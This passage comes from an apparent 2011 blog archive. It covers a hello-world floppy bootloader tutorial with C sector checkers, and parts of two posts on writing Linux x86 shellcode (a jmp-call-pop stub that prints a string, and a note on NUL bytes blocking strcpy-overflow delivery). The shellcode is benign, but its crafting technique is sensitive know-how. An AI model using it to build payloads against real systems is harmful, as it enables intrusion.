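    printf("rc=%d jmp->%zu call->%zu data@%zu nul=%zu rebuilt=%s\n", rc, jt, ct, doff,
           count_nul_bytes(page_shellcode, PAGE_LEN), stub_matches_page() ? "same" : "DIFF");
    return rc;
}
```

Running it reports that the jmp lands on the call at offset 52, the call returns to the pop at offset 2, the string starts at 57, and the rebuilt stub is identical to the pasted bytes. It also reports 24 NUL bytes: fine for this exercise, where the compiler copies the array, but the reason this version could never be delivered through a strcpy()-style overflow.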
<div class="separator" style="clear: both; text-align: left;">Result:<span class="Apple-style-span"> </span></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/--DzCCLfJvjc/Tg9Br3Z5riI/AAAAAAAAAFQ/AH98Ww9E4gU/s1600/gdb.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="400" src="http://1.bp.blogspot.com/--DzCCLfJvjc/Tg9Br3Z5riI/AAAAAAAAAFQ/AH98Ww9E4gU/s400/gdb.jpg" width="330" /></a></div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: left;"><span class="Apple-style-span">reference website: </span><a href="http://www.governmentsecurity.org/forum/topic/19441-reduce-shellcode-by-4-bytes/"><span class="Apple-style-span">http://www.governmentsecurity.org/forum/topic/19441-reduce-shellcode-by-4-bytes/ </span></a></div>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-2355666947380700882011-06-30T02:56:00.000-07:002011-11-02T09:07:00.923-07:00Simple OS - bootloader part1Over the past few days I have finished writing the bootloader. I have summarized some of it and will post it on the blog.<br />
<br />
<b>Introduction:</b><br />
Before we start writing our code, here is some background knowledge.<br />
<b>Bootloader:</b><br />
What is a bootloader?<br />
A bootloader is a small program that loads the kernel image into memory and jumps to it.<br />
<br />
How does it work?<br />
When you press the power button, the BIOS runs first. It decides which device to boot from and reads that device's first sector (the MBR).<br />
If the sector ends with the boot signature 0x55 0xAA, the BIOS copies it to physical address 0x7C00 and jumps to it; nothing else in the sector is checked.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-sud9r1AI3ng/Tgw8GRFxZfI/AAAAAAAAAEY/Rj-2srWrWkI/s1600/bootProcess.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="114" src="http://3.bp.blogspot.com/-sud9r1AI3ng/Tgw8GRFxZfI/AAAAAAAAAEY/Rj-2srWrWkI/s320/bootProcess.jpg" width="320" /></a></div><br />
<b>MBR:</b><br />
What is the MBR?<br />
MBR stands for master boot record. As the name suggests, the code inside it is the (first-stage) bootloader. In most cases the MBR is the first sector of the boot device, such as a hard disk or floppy disk. Note that a floppy has no partition table: its first sector carries a FAT BIOS Parameter Block instead, which is the layout the example below uses.<br />
<br />
The MBR is 512 bytes and contains the following fields:<br />
a. code 440bytes<br />
b. Disk signature 4 bytes.<br />
c. null 2 bytes<br />
d. Partition tables. 64bytes<br />
e. MBR signature 2 bytes.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-XfOu3tS1O-I/Tgw9J2X1wNI/AAAAAAAAAEc/es0SCTcCpns/s1600/masterBootRecord.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="122" src="http://4.bp.blogspot.com/-XfOu3tS1O-I/Tgw9J2X1wNI/AAAAAAAAAEc/es0SCTcCpns/s320/masterBootRecord.jpg" width="320" /></a></div><br />
<b>BIOS interrupt:</b><br />
What is a BIOS interrupt?<br />
A BIOS interrupt is a software interrupt whose handler is provided by the BIOS, so it is already in memory before the bootloader runs. The BIOS interrupts offer routines for talking to the disk, screen and keyboard without understanding the hardware in detail.<br />
<br />
Why use BIOS interrupts?<br />
As mentioned above, the bootloader's job is to load the kernel image into memory, so at that point there are no OS system calls or drivers to help you do I/O. The simplest and most convenient way is to let the BIOS interrupts handle the I/O.<br />
<br />
<b>Coding time:</b><br />
With that background, it's time to write a simple hello-world bootloader.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">Helloworld.S</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;">.code1<span style="color: #008c00;">6</span>
.<span style="color: #004a43;">section</span> .text
.<span style="color: #004a43;">global</span> main
<span style="color: #e34adc;">main:</span>
<span style="color: red;">#FAT12 file system format
#there is nothing to change </span><span style="color: red; font-weight: bold;">in</span><span style="color: red;"> this part
</span><span style="color: red; font-weight: bold;">jmp</span><span style="color: red;"> start_prog
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0x90
.ascii "MicrMike"
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 512
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 1
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 1
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 2
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 224
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 2880
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0xf0
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 9
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 18
.</span><span style="color: red; font-weight: bold;">word</span><span style="color: red;"> 2
.long 0
.long 2880
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0
.</span><span style="color: red; font-weight: bold;">byte</span><span style="color: red;"> 0x29
.long 0x19900303
.ascii "HELLO-OS "
.ascii "FAT12 "
.fill 18, 1, 0</span>
<span style="color: #e34adc;">start_prog:</span>
movw <span style="color: green;">$0x07c0</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ax</span>   # BIOS loads us at 0000:7C00, ld linked us at 0: 07C0:offset == 0x7C00 + offset
movw <span style="color: #308080;">%</span><span style="color: navy;">ax</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ds</span>
movw <span style="color: #308080;">%</span><span style="color: navy;">ax</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">es</span>
xorw <span style="color: #308080;">%</span><span style="color: navy;">ax</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ax</span>
movw <span style="color: #308080;">%</span><span style="color: navy;">ax</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ss</span>
movw <span style="color: green;">$0x7c00</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">sp</span>   # stack grows down from just below the boot sector; int $0x10 needs one
movw $msg<span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">si</span>
#using bios interrupt <span style="color: green;">10h</span>
#parameter of bios interrupt <span style="color: green;">10h</span>
<span style="color: #e34adc;">#%ah:</span> function number, <span style="color: green;">0xe</span> = teletype output
<span style="color: #e34adc;">#%al:</span> the character to print (not the address of the message)
<span style="color: #e34adc;">loop:</span>
movb $<span style="color: green;">0xe</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">ah</span>
movb <span style="color: #308080;">(</span><span style="color: #308080;">%</span><span style="color: navy;">si</span><span style="color: #308080;">)</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">al</span>
cmpb <span style="color: green;">$0</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">al</span>
<span style="color: #200080; font-weight: bold;">je</span> <span style="color: #e34adc;">fin</span>
<span style="color: #200080; font-weight: bold;">int</span> $<span style="color: green;">0x10</span>
addw <span style="color: green;">$1</span><span style="color: #308080;">,</span> <span style="color: #308080;">%</span><span style="color: navy;">si</span>
<span style="color: #200080; font-weight: bold;">jmp</span> <span style="color: #e34adc;">loop</span>
<span style="color: #e34adc;">fin:</span>
<span style="color: #200080; font-weight: bold;">jmp</span> <span style="color: #e34adc;">fin</span>
<span style="color: #e34adc;">msg:</span>
.ascii <span style="color: #1060b6;">"Hello world!!."</span>
.<span style="color: #200080; font-weight: bold;">byte</span> <span style="color: #008c00;">0</span>
.<span style="color: #004a43;">org</span> <span style="color: green;">0x1fe</span><span style="color: #308080;">,</span> <span style="color: green;">0x00</span>
.<span style="color: #200080; font-weight: bold;">word</span> <span style="color: green;">0xaa55</span></pre><div>P.S. The source above uses AT&amp;T syntax. This article does not teach assembly itself; there are good tutorials a search away.</div><b>Comment:</b><br />
There are several things worth noticing in the source code.<br />
1. The red block is the FAT12 BIOS Parameter Block (BPB). mkdosfs writes its own BPB, but the dd step below overwrites the whole first sector with ours, so these values must still describe a 1.44 MB floppy or the image will not mount. Do not change them.<br />
2. We are in real mode. The BIOS loads the sector at 0000:7C00, but ld is told to link it at 0x0, so an absolute reference such as $msg is an offset from 0 and the segment registers must be set to match: with %ds = 0x07C0, the address 07C0:msg resolves to 0x7C00 + msg. Leaving %ds at 0 makes the loop read the interrupt vector table instead of the string. %ss:%sp is set explicitly as well, because int $0x10 pushes its return frame onto the stack.<br />
3. To print a message on the screen, I use a BIOS interrupt.<br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b>bios interrupt 10h</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b> %ah holds the function number, here 0x0e (teletype output).</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;"><i><b> %al holds the character to print, not the address of the message; that is why the loop feeds it one byte at a time.</b></i></span><br />
<span class="Apple-style-span" style="font-family: inherit;">4. At the end of the sector, don't forget the boot signature: the bytes 0x55 0xAA at offset 0x1FE (written as .word 0xaa55, little-endian). Without it the BIOS treats the sector as not bootable.</span><br />
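To see the field list in the MBR section and the BPB and signature comments above in one place, here is a checker for a first sector, written in C. It is an added example and not part of the original post: it verifies the 0xAA55 signature, decodes the FAT12 BPB in the same field order as Helloworld.S, and walks the MBR partition table, so it tells a floppy boot sector apart from a partitioned disk's MBR. The floppy sample is constructed from the values in Helloworld.S; the MBR sample and all function names are my own.

```c
/* Added example for this post (not code from the original): a checker for a
 * 512-byte first sector.  It tests the 0xAA55 signature the BIOS looks for,
 * decodes the FAT12 BIOS Parameter Block (the red block in Helloworld.S) and
 * walks the MBR partition table.  Both sample sectors are constructed here;
 * the MBR one is invented. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SECTOR_SIZE 512

struct bpb {
    char     oem[9], label[12], fstype[9];
    uint16_t bytes_per_sector, reserved_sectors, root_entries, total_sectors;
    uint16_t sectors_per_fat, sectors_per_track, heads;
    uint8_t  sectors_per_cluster, fat_count, media;
};
struct part { uint8_t boot, type; uint32_t lba_start, sectors; };

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

/* The only check the BIOS makes before copying the sector to 0x7C00. */
int has_boot_signature(const uint8_t *s) { return s[0x1fe] == 0x55 && s[0x1ff] == 0xaa; }

/* FAT boot sector: "jmp short; nop" (EB xx 90) or "jmp near" (E9), then the
 * BPB from offset 11 in the same field order as Helloworld.S.  0 on success. */
int parse_bpb(const uint8_t *s, struct bpb *b)
{
    if (!((s[0] == 0xeb && s[2] == 0x90) || s[0] == 0xe9)) return -1;
    memcpy(b->oem, s + 3, 8);  b->oem[8] = 0;
    b->bytes_per_sector  = rd16(s + 11);  b->sectors_per_cluster = s[13];
    b->reserved_sectors  = rd16(s + 14);  b->fat_count           = s[16];
    b->root_entries      = rd16(s + 17);  b->total_sectors       = rd16(s + 19);
    b->media             = s[21];         b->sectors_per_fat     = rd16(s + 22);
    b->sectors_per_track = rd16(s + 24);  b->heads               = rd16(s + 26);
    if (s[38] != 0x29) return -2;         /* extended boot signature missing */
    memcpy(b->label, s + 43, 11); b->label[11] = 0;
    memcpy(b->fstype, s + 54, 8); b->fstype[8] = 0;
    return 0;
}

/* MBR: four 16-byte entries at 0x1BE (status, CHS start, type, CHS end,
 * LBA start, sector count).  Returns entries in use, or -1 on a bad status. */
int parse_partitions(const uint8_t *s, struct part out[4])
{
    int n = 0;
    for (int i = 0; i < 4; i++) {
        const uint8_t *e = s + 0x1be + 16 * i;
        if (e[0] != 0x00 && e[0] != 0x80) return -1;
        if (e[4] == 0) continue;                           /* empty slot */
        out[n].boot = e[0];             out[n].type = e[4];
        out[n].lba_start = rd32(e + 8); out[n].sectors = rd32(e + 12);
        n++;
    }
    return n;
}

/* Constructed: the BPB values from Helloworld.S.  0x4e is the jmp distance that
 * layout produces (62-byte BPB + 18-byte fill = 0x50, minus the 2-byte jmp). */
void make_floppy_sector(uint8_t *s)
{
    static const uint8_t hdr[62] = {
        0xeb,0x4e,0x90, 'M','i','c','r','M','i','k','e',
        0x00,0x02, 0x01, 0x01,0x00, 0x02, 0xe0,0x00, 0x40,0x0b, 0xf0,
        0x09,0x00, 0x12,0x00, 0x02,0x00, 0,0,0,0, 0x40,0x0b,0,0,
        0x00, 0x00, 0x29, 0x03,0x03,0x90,0x19,
        'H','E','L','L','O','-','O','S',' ',' ',' ', 'F','A','T','1','2',' ',' ',' ' };
    memset(s, 0, SECTOR_SIZE);
    memcpy(s, hdr, sizeof hdr);
    s[0x1fe] = 0x55; s[0x1ff] = 0xaa;
}

/* Constructed (invented): one active Linux partition at LBA 2048, 512 MiB. */
void make_mbr_sector(uint8_t *s)
{
    static const uint8_t entry[16] = { 0x80, 0,0,0, 0x83, 0,0,0,
                                       0x00,0x08,0x00,0x00, 0x00,0x00,0x10,0x00 };
    memset(s, 0, SECTOR_SIZE);
    memcpy(s + 0x1be, entry, sizeof entry);
    s[0x1fe] = 0x55; s[0x1ff] = 0xaa;
}

/* Runs every check against both samples; returns how many failed (0 = ok). */
int selftest(void)
{
    uint8_t s[SECTOR_SIZE]; struct bpb b = {{0}}; struct part p[4]; int bad = 0;
    make_floppy_sector(s);
    bad += !has_boot_signature(s) + (parse_bpb(s, &b) != 0);
    bad += b.bytes_per_sector != 512 || b.total_sectors != 2880 || b.sectors_per_fat != 9;
    bad += b.root_entries != 224 || b.media != 0xf0 || b.heads != 2;
    bad += strcmp(b.oem, "MicrMike") != 0 || strcmp(b.fstype, "FAT12   ") != 0;
    bad += parse_partitions(s, p) != 0;          /* a floppy has no partition table */
    make_mbr_sector(s);
    bad += !has_boot_signature(s) + (parse_bpb(s, &b) != -1);
    bad += parse_partitions(s, p) != 1;
    bad += p[0].boot != 0x80 || p[0].type != 0x83 || p[0].lba_start != 2048 || p[0].sectors != 1048576;
    s[0x1ff] = 0;                                 /* corrupt the signature */
    bad += has_boot_signature(s);
    return bad;
}

int main(void) { int bad = selftest(); printf("%d check(s) failed\n", bad); return bad != 0; }
```

To run it against a real image, read the first 512 bytes of os.flp (or of /dev/sda) into a buffer and call has_boot_signature, parse_bpb and parse_partitions on it; on the floppy image built below, parse_bpb should return the values listed in the red block and parse_partitions should report no entries.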
<b>Compile:</b><br />
1. use gcc to compile the source code:<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -c Helloworld.S</span><br />
<span class="Apple-style-span" style="font-family: inherit;">2. use ld to link the object file into a flat binary:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">ld -Ttext=0x0 --oformat binary Helloworld.o -o Helloworld.bin</span><br />
<span class="Apple-style-span" style="font-family: inherit;">3. use mkdosfs to create a virtual floppy disk image:</span><br />
<span class="Apple-style-span" style="font-family: inherit;"> </span><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">mkdosfs -C os.flp 1440</span><br />
<span class="Apple-style-span" style="font-family: inherit;"><span class="Apple-style-span" style="font-family: inherit;">4. install the binary into the virtual floppy image with dd (conv=notrunc overwrites the first sector without truncating the image):</span></span><span class="Apple-style-span" style="font-family: inherit;"> </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">dd status=noxfer conv=notrunc if=$boot_bin of=os.flp</span><br />
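<div>Added example (not the post's code): the same build-and-install pipeline written in C, so that the three facts behind steps 2 to 4 are visible in one place: <span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">.org 0x1fe, 0x00</span> pads with zeros, <span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">.word 0xaa55</span> stores 0x55 and then 0xaa because x86 is little-endian, and <span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">conv=notrunc</span> leaves the rest of the floppy image alone. The sample code bytes, FLOPPY_SIZE and all function names are constructed for this example; has_boot_signature is the check worth running on an image before handing it to qemu.</div>

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define SECTOR_SIZE 512
#define SIG_OFFSET  0x1fe            /* where ".org 0x1fe, 0x00" pads up to   */
#define BOOT_SIG    0xaa55           /* the ".word 0xaa55" the sector ends on */
#define FLOPPY_SIZE (1440 * 1024)    /* what "mkdosfs -C os.flp 1440" creates */

/* Lay out a boot sector the way the assembly source does: code and message
 * first, zero padding up to 0x1fe, then the signature. Because x86 is
 * little-endian, ".word 0xaa55" puts 0x55 at byte 510 and 0xaa at byte 511.
 * Returns 0 on success, -1 if the code would overlap the signature (the case
 * in which ".org" refuses to assemble). */
int build_boot_sector(const uint8_t *code, size_t code_len, uint8_t *sector)
{
    if (code_len > SIG_OFFSET)
        return -1;
    memset(sector, 0, SECTOR_SIZE);
    memcpy(sector, code, code_len);
    sector[SIG_OFFSET]     = BOOT_SIG & 0xff;         /* 0x55 */
    sector[SIG_OFFSET + 1] = (BOOT_SIG >> 8) & 0xff;  /* 0xaa */
    return 0;
}

/* The test the BIOS applies before it jumps into the first sector: is it a
 * full 512 bytes and does it end in 55 AA? Returns 1 if bootable, else 0. */
int has_boot_signature(const uint8_t *buf, size_t len)
{
    if (len < SECTOR_SIZE)
        return 0;
    return buf[SIG_OFFSET] == 0x55 && buf[SIG_OFFSET + 1] == 0xaa;
}

/* What "dd conv=notrunc if=Helloworld.bin of=os.flp" does: overwrite only
 * the first sector and leave the rest of the image untouched. Without
 * conv=notrunc, dd would truncate os.flp to 512 bytes. Returns 0, or -1 if
 * the image is smaller than one sector. */
int install_boot_sector(uint8_t *image, size_t image_len, const uint8_t *sector)
{
    if (image_len < SECTOR_SIZE)
        return -1;
    memcpy(image, sector, SECTOR_SIZE);
    return 0;
}

/* Constructed stand-in for the assembled Helloworld.bin: "jmp ." (eb fe)
 * followed by a NUL-terminated message. Not the post's real code. */
static const uint8_t sample_code[] = { 0xeb, 0xfe, 'H', 'i', '!', 0 };

/* Run the build -> install -> verify pipeline on the sample. Returns the
 * number of failed checks; 0 means the image passes the signature test. */
int run_pipeline(void)
{
    static uint8_t image[FLOPPY_SIZE];     /* stands in for os.flp */
    uint8_t sector[SECTOR_SIZE];
    int failures = 0;

    memset(image, 0xf6, sizeof image);     /* pretend mkdosfs formatted it */
    if (build_boot_sector(sample_code, sizeof sample_code, sector) != 0) failures++;
    if (!has_boot_signature(sector, sizeof sector))                     failures++;
    if (install_boot_sector(image, sizeof image, sector) != 0)          failures++;
    if (!has_boot_signature(image, sizeof image))                       failures++;
    if (image[SECTOR_SIZE] != 0xf6)  /* notrunc: byte 512 onwards is untouched */
        failures++;
    return failures;
}

int main(void)
{
    int failures = run_pipeline();
    printf("%d check(s) failed\n", failures);
    return failures != 0;
}
```

<div>Compile with <span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -std=c99 -Wall</span> and run it; the interesting failure mode is build_boot_sector returning -1, which is the same condition that makes the assembler reject .org when the code plus message grows past 0x1fe bytes.</div>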
<b>Result:</b><br />
Use qemu to test the result:<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">qemu -fda os.flp</span><br />
<span class="Apple-style-span" style="font-family: inherit;">and you will see the hello world message in qemu.</span><br />
<br />
Reference website:<br />
<a href="http://duartes.org/gustavo/blog/post/how-computers-boot-up">http://duartes.org/gustavo/blog/post/how-computers-boot-up</a>Anonymoushttp://www.blogger.com/profile/17959708504094936061noreply@blogger.com0tag:blogger.com,1999:blog-1191178933370250826.post-11557886549045952362011-06-29T12:15:00.000-07:002011-11-02T07:11:19.178-07:00Shell code 3 (print message)After the exit_shell.out program is finished, it's time to move on.<br />
This time I will use a new system call, one that prints a message to the screen.<br />
<br />
<b>Background Knowledge:</b><br />
The way I invoke the system call is the same as before: int $0x80.<br />
The parameters of the print (write) system call:<br />
eax = 4 => the system call number.<br />
ebx = 1 => file descriptor 1, so the message goes to stdout.<br />
ecx = msg => the address of the message.<br />
edx = len => the length of the message.<br />
<br />
OK, coding time.<br />
1. write the program using inline assembly.<br />
<span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print.c</span><br />
<pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">char</span> msg<span style="color: #308080;">[</span><span style="color: #308080;">]</span><span style="color: #308080;">=</span><span style="color: maroon;">"</span><span style="color: #1060b6;">Run Han</span><span style="color: maroon;">"</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $msg,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">cx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div><span class="Apple-style-span" style="font-family: inherit;">2. compile the source code with the following command:</span></div><div><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">gcc -g -o print.out print.c</span></div><div>3. execute the program<br />
<br />
</div><div>As you can see, the message lives in the global data section, and that's not good: I want the message to be inside the shell code itself. Let's modify the source code a bit.</div><div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print_1.c</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0x7,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">dx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> <span style="color: red;">movl $msg,</span></span><span style="color: red;">%ecx;\</span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $0,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> int $0x80;</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> .string </span><span style="color: maroon;">"</span>Run Han<span style="color: maroon;">"</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> </span><span style="color: maroon;">"</span><span style="color: #308080;">)</span><span style="color: #406080;">;</span>
<span style="color: #200080; font-weight: bold;">return</span> <span style="color: #008c00;">0</span><span style="color: #406080;">;</span>
<span style="color: #406080;">}</span></pre><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><br />
</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">However, written this way, how do I know the address of the message? The red movl $msg,%ecx line no longer has a symbol to refer to.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">Thanks to this web site: <a href="http://insecure.org/stf/smashstack.html">http://insecure.org/stf/smashstack.html</a></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">I found the solution. The following is the modified version of the code.</div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"><span class="Apple-style-span" style="font-family: 'Courier New',Courier,monospace;">print_2.c</span></div><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;"></div><pre style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; background-color: #f6f8ff; color: #000020; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-align: -webkit-auto; text-indent: 0px; text-transform: none; widows: 2; word-spacing: 0px;"><span style="color: #200080; font-weight: bold;">int</span> <span style="color: #400000;">main</span><span style="color: #308080;">(</span><span style="color: #308080;">)</span><span style="color: #406080;">{</span>
__asm__<span style="color: #308080;">(</span><span style="color: maroon;">"</span><span style="color: #1060b6;">jmp 2f;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #2byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> 1:;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> popl </span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">si;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #1byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $4,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">ax;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
<span style="color: #1060b6;"> movl $1,</span><span style="color: #0f69ff;">%e</span><span style="color: #1060b6;">bx;</span><span style="color: #0f69ff;">\n</span><span style="color: #0f69ff;">\ </span><span style="color: #1060b6;"> #5byte</span><span style="background-attachment: initial; background-clip: initial; background-color: #dd9999; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; color: white; font-style: italic; font-weight: bold;">s</span><span style="color: #1060b6;"></span>
